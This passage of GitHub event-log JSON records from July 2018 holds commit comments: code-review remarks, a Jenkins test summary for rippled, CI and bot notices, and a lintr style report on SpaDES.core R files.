{"id":"8031474736","type":"CommitCommentEvent","actor":{"login":"ZeroChaos-"},"repo":{"name":"pentoo/pentoo-overlay"},"payload":{"comment":{"id":29865849,"position":null,"line":null,"path":null,"commit_id":"344bf164516e8a75d9253bd79ee6c8436ba6e9f7","created_at":"2018-07-28T02:02:15Z","updated_at":"2018-07-28T02:02:15Z","author_association":"CONTRIBUTOR","body":"I did add it to the proper arch profile, but that doesn't make repoman\nhappy.\n\nOn Fri, Jul 27, 2018 at 9:48 PM Anton Bolshakov <notifications@github.com>\nwrote:\n\n> There is an obvious advantage of it. It allows to see which ebuild need to\n> be tested and keyworded at particular arch instead of faking it\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/pentoo/pentoo-overlay/commit/344bf164516e8a75d9253bd79ee6c8436ba6e9f7#commitcomment-29865783>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABl--dX9iIe1fS_rJmJkipOAs_ng_17mks5uK8LagaJpZM4Vk1Rp>\n> .\n>\n"}},"created_at":"2018-07-28T02:02:15Z"}
{"id":"8031478477","type":"CommitCommentEvent","actor":{"login":"yellows8"},"repo":{"name":"switchbrew/libnx"},"payload":{"comment":{"id":29865853,"position":5,"line":435,"path":"nx/source/services/fs.c","commit_id":"18a841c8504efd64c5ace9e897795953a69ec026","created_at":"2018-07-28T02:05:28Z","updated_at":"2018-07-28T02:05:28Z","author_association":"CONTRIBUTOR","body":"sizeof()-1"}},"created_at":"2018-07-28T02:05:28Z"}
{"id":"8031481790","type":"CommitCommentEvent","actor":{"login":"fincs"},"repo":{"name":"switchbrew/libnx"},"payload":{"comment":{"id":29865865,"position":4,"line":434,"path":"nx/source/services/fs.c","commit_id":"18a841c8504efd64c5ace9e897795953a69ec026","created_at":"2018-07-28T02:08:09Z","updated_at":"2018-07-28T02:08:09Z","author_association":"CONTRIBUTOR","body":"` = {0};`"}},"created_at":"2018-07-28T02:08:09Z"}
{"id":"8031482281","type":"CommitCommentEvent","actor":{"login":"fincs"},"repo":{"name":"switchbrew/libnx"},"payload":{"comment":{"id":29865866,"position":6,"line":436,"path":"nx/source/services/fs.c","commit_id":"18a841c8504efd64c5ace9e897795953a69ec026","created_at":"2018-07-28T02:08:31Z","updated_at":"2018-07-28T02:08:31Z","author_association":"CONTRIBUTOR","body":"Not needed with above changes"}},"created_at":"2018-07-28T02:08:31Z"}
{"id":"8031482614","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"scottschurr/rippled"},"payload":{"comment":{"id":29865868,"position":null,"line":null,"path":null,"commit_id":"09050a860be745c88a54fbcbce1e317c72f2f51e","created_at":"2018-07-28T02:08:47Z","updated_at":"2018-07-28T02:08:47Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/scottschurr/rippled/commit/09050a860be745c88a54fbcbce1e317c72f2f51e)\n\nBuilt at __20180728 - 02:08:46__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.Debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/msvc.Debug.txt) | 1031 cases, 0 failed, t: 539s | PASS :white_check_mark: \nmsvc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/msvc.Debug_NINJA_BUILD_true.txt) | 1031 cases, 0 failed, t: 558s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nmsvc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/msvc.Debug_Dunity_OFF.txt) | 1027 cases, 0 failed, t: 1176s | PASS :white_check_mark: \nmsvc.Release | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/msvc.Release.txt) | 1031 cases, 0 failed, t: 393s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/gcc.Release_Dassert_ON_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 925s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.Debug <br/>-Dcoverage=ON | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/gcc.Debug_Dcoverage_ON.txt) | 1034 cases, 0 failed, t: 845s | PASS :white_check_mark: \nclang.Debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/clang.Debug.txt) | 1034 cases, 0 failed, t: 276s | PASS :white_check_mark: \ngcc.Debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/gcc.Debug.txt) | 1034 cases, 0 failed, t: 288s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/clang.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 612s | PASS :white_check_mark: \ngcc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/gcc.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 231s | PASS :white_check_mark: \nclang.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/clang.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 396s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/gcc.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 423s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/gcc.Debug_Dstatic_OFF.txt) | 1034 cases, 0 failed, t: 288s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF -DBUILD_SHARED_LIBS=ON | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/gcc.Debug_Dstatic_OFF_DBUILD_SHARED_LIBS_ON.txt) | 1034 cases, 0 failed, t: 291s | PASS :white_check_mark: \ngcc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/gcc.Debug_NINJA_BUILD_true.txt) | 1034 cases, 0 failed, t: 263s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=address, <br/>PARALLEL_TESTS=false, <br/>DEBUGGER=false | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/clang.Debug_Dunity_OFF_Dsan_address_PARALLEL_TESTS_false_DEBUGGER_false.txt) | 1030 cases, 0 failed, t: 869s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=undefined, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/develop/16//artifact/clang.Debug_Dunity_OFF_Dsan_undefined_PARALLEL_TESTS_false.txt) | 1030 cases, 0 failed, t: 1103s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-28T02:08:47Z"}
{"id":"8031482977","type":"CommitCommentEvent","actor":{"login":"aryunaabhay"},"repo":{"name":"hyp3rventures/PKHUD"},"payload":{"comment":{"id":29865870,"position":11,"line":11,"path":"PKHUD/PKHUDToastView.swift","commit_id":"dc77df80257b06ef3f5f3d88f1a7be3d685f4cd6","created_at":"2018-07-28T02:09:06Z","updated_at":"2018-07-28T02:09:06Z","author_association":"NONE","body":"it seems that this should just extend from PKHUDTextView and override only whats needed if there anything to be overriden"}},"created_at":"2018-07-28T02:09:06Z"}
{"id":"8031483369","type":"CommitCommentEvent","actor":{"login":"sixgod123"},"repo":{"name":"sixgod123/project"},"payload":{"comment":{"id":29865872,"position":null,"line":null,"path":null,"commit_id":"9ee074f02275b0807695e8459d81685c18d907a3","created_at":"2018-07-28T02:09:24Z","updated_at":"2018-07-28T02:09:24Z","author_association":"OWNER","body":"add ：finance predict model"}},"created_at":"2018-07-28T02:09:24Z"}
{"id":"8031485118","type":"CommitCommentEvent","actor":{"login":"oleg-baturov"},"repo":{"name":"norestlabs/mousexplore-vcoins"},"payload":{"comment":{"id":29865877,"position":10,"line":10,"path":"Neo/services/cron.service.addr.js","commit_id":"71090f6231936f91d93f65eac34f627f9f9efbe7","created_at":"2018-07-28T02:10:42Z","updated_at":"2018-07-28T02:10:42Z","author_association":"MEMBER","body":"No need to use new log.\r\ncron.debug.log will be enough."}},"created_at":"2018-07-28T02:10:42Z"}
{"id":"8031507756","type":"CommitCommentEvent","actor":{"login":"ebruck"},"repo":{"name":"bluzelle/swarmDB"},"payload":{"comment":{"id":29865940,"position":47,"line":408,"path":"raft/raft.cpp","commit_id":"19cca924af2e07cc78396d7f3a98844a2922794b","created_at":"2018-07-28T02:29:56Z","updated_at":"2018-07-28T02:29:56Z","author_association":"CONTRIBUTOR","body":"only one indent"}},"created_at":"2018-07-28T02:29:56Z"}
{"id":"8031508941","type":"CommitCommentEvent","actor":{"login":"timg512372"},"repo":{"name":"rsimpsonn/etherball"},"payload":{"comment":{"id":29865945,"position":null,"line":null,"path":null,"commit_id":"f84d86f1262007d105d5ebe49418be97d363b35e","created_at":"2018-07-28T02:30:51Z","updated_at":"2018-07-28T02:30:51Z","author_association":"COLLABORATOR","body":"never mind it didn't work"}},"created_at":"2018-07-28T02:30:51Z"}
{"id":"8031510435","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"ImpladeDeveloped/Implactor"},"payload":{"comment":{"id":29865946,"position":null,"line":null,"path":null,"commit_id":"c8daa71052be19c59916f40ecac8d219fabfa3f9","created_at":"2018-07-28T02:32:04Z","updated_at":"2018-07-28T02:32:04Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user Zadezter, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/ImpladeDeveloped/Implactor/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `689d6ad2-920e-11e8-93b2-1c64a9ae562a`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T02:32:04Z"}
{"id":"8031512087","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29865954,"position":1,"line":null,"path":"1532745205.74/github_test.txt","commit_id":"74b9084595f549af4a8652b103e5345b29b57846","created_at":"2018-07-28T02:33:28Z","updated_at":"2018-07-28T02:33:28Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-28T02:33:28Z"}
{"id":"8031512728","type":"CommitCommentEvent","actor":{"login":"mhluska"},"repo":{"name":"DanielThomas/ec2gaming"},"payload":{"comment":{"id":29865961,"position":null,"line":null,"path":null,"commit_id":"bea726ba662e89ae4907b43ae0dce32d49c178d8","created_at":"2018-07-28T02:34:01Z","updated_at":"2018-07-28T02:34:01Z","author_association":"NONE","body":"This causes a reference error \"REGION: command not found\". It needs to be `$REGION`."}},"created_at":"2018-07-28T02:34:01Z"}
{"id":"8031516211","type":"CommitCommentEvent","actor":{"login":"blshkv"},"repo":{"name":"pentoo/pentoo-overlay"},"payload":{"comment":{"id":29865968,"position":null,"line":null,"path":null,"commit_id":"344bf164516e8a75d9253bd79ee6c8436ba6e9f7","created_at":"2018-07-28T02:36:55Z","updated_at":"2018-07-28T02:36:55Z","author_association":"CONTRIBUTOR","body":"please test this: https://github.com/pentoo/pentoo-overlay/commit/1415348cb5aef3548b83300d3855a092f563b37e"}},"created_at":"2018-07-28T02:36:55Z"}
{"id":"8031524177","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pickle5-feedstock"},"payload":{"comment":{"id":29865984,"position":null,"line":null,"path":null,"commit_id":"ed7f2cc20e4ef441d8b1a6b4e0b23701aeb5e025","created_at":"2018-07-28T02:43:51Z","updated_at":"2018-07-28T02:43:51Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @pitrou was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-28T02:43:51Z"}
{"id":"8031524708","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29865985,"position":null,"line":null,"path":null,"commit_id":"da41c1bb949241fd26267a0f455b5b689b66cab2","created_at":"2018-07-28T02:44:17Z","updated_at":"2018-07-28T02:44:17Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) 